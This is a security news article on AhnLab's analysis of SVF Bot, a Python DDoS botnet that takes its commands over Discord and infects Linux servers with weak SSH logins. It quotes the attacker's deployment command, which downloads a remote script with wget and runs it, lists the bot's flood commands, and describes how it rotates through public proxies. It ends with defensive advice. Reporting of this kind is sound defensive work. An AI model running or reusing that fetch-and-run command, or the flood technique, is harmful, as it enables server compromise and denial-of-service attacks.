SVF Botnet: New Python DDoS Threat Leverages Discord for Stealthy C&C on Linux Servers

In a recent analysis, AhnLab’s Security Intelligence Center (ASEC) has uncovered an emerging threat targeting misconfigured and weakly protected Linux servers. The campaign revolves around a Python-based DDoS botnet called SVF Bot, which leverages Discord as a command-and-control (C&C) channel, showcasing the increasing trend of abuse of legitimate platforms for malicious operations.

ASEC researchers, using honeypots with exposed SSH services secured by weak credentials, observed numerous attacks by threat actors deploying SVF Bot malware.

This bot, developed in Python, sets up a virtual environment, installs dependencies like discord, requests, and aiohttp, and retrieves its payload from external servers.

python -m venv venv; source ./venv/bin/activate; pip install discord discord.py requests aiohttp lxml; wget hxxps://termbin[.]com/4ccx -O main.py; python main.py -s 5

The number “5” indicates a server group ID, allowing attackers to assign infected hosts into manageable botnet clusters.

The SVF Bot’s main functionality centers around launching Layer 7 (HTTP flood) and Layer 4 (UDP flood) DDoS attacks. It supports a range of commands issued via Discord, including:

• $http, $customhttp for HTTP floods
• $udp, $customudp for UDP floods
• $load, $unload for managing proxy lists
• $restart, $crash, $stop for bot lifecycle management

“Most of the supported commands are for DDoS attacks, with L7 HTTP Flood and L4 UDP Flood being the main types supported,” the report writes.

One of SVF Bot’s distinguishing features is its integration with public proxy services to increase the stealth and effectiveness of its HTTP flood attacks. The malware scrapes proxy lists from at least 10 public sources, including sslproxies.org, free-proxy-list.net, and GitHub repositories.

“The malware randomly selects a proxy address from the list to use when attempting to connect,” the report explains.

Before use, each proxy undergoes a validation routine involving Google login attempts to ensure functionality.

“The source code contains a description stating that the malware was created by ‘SVF Team’ and that it was developed for fun because the Botnet using PuTTY was not working,” the report states.

The botnet’s functionality and reach suggest a serious threat to undersecured Linux infrastructure.

The ongoing spread of SVF Botnet underscores the need for basic server hygiene and defensive practices. ASEC advises:

• Use strong, non-default passwords and rotate them regularly
• Patch systems and software to the latest versions
• Restrict external access to SSH ports with firewalls

Related Posts:

• Microsoft Graph API Exploited for Stealthy Attacks
• Hackers Exploit Google Ads to Spread Malware Disguised as Popular Software
• Warning: Discord’s API Exploited for Malicious Takeover
• Malicious PyPI Package Targets Discord Developers with Token Theft and Backdoor Exploit

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal

Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy